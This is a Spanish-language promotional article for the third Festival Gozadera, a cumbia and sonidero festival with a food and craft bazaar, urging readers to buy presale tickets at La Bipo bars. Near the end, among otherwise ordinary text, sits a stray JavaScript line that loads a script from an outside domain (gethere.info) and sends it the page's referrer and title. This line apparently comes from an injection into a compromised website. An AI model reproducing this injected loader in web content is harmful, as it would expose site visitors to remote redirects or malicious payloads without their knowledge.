Todo listo para que no dejes de bailar en el Festival Gozadera

En su tercera edición, el Festival Gozadera @gozaderafest llega ofreciendo una experiencia única, creando un evento que integra la música, el baile y la comida de una forma muy particular.

festival-gozadera

Este año Gozadera está dispuesto a hacer la diferencia porque, además de que la diversión es garantizada, el festival nos promete múltiples estilos musicales que son capaces de poner a bailar a cualquiera.

El cartel de este año se integra por diversas bandas con alto reconocimiento nacional, entre los que se destaca la Electro Cumbia, Sonidero, Sonido La Changa, Sonido Gallo Negro @sonidogayonegro, Chicha,Cumbia Amazónica, y otros más.

 

Pero esto no es todo, porque si lo tuyo no es bailar en las panchangas, no te preocupes, pues habrá un foro con más de 20 stands donde se recreará un apetecible bazar gastronómico y artesanal, en el que, además de comida, podrás encontrar accesorios y souvenirs creados por manos mexicanas.

Asistir al Festival Gozadera es más que tomar y perder el control, se trata de una actividad recreativa con pizcas de diversión invadiendo tu cuerpo. Únete a esta fiesta con exclusividad de 5 mil personas y emociónate con esta combinación de ritmos.

Corre a La Bipo Roma @LaBipoRoma, La Bipo Coyoacán @LaBipoCoyoacan o a La Bipo San Ángel @LaBipoSanAngel y, después de echarte unos traguitos, aprovecha la preventa de los boletos.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|
Comentarios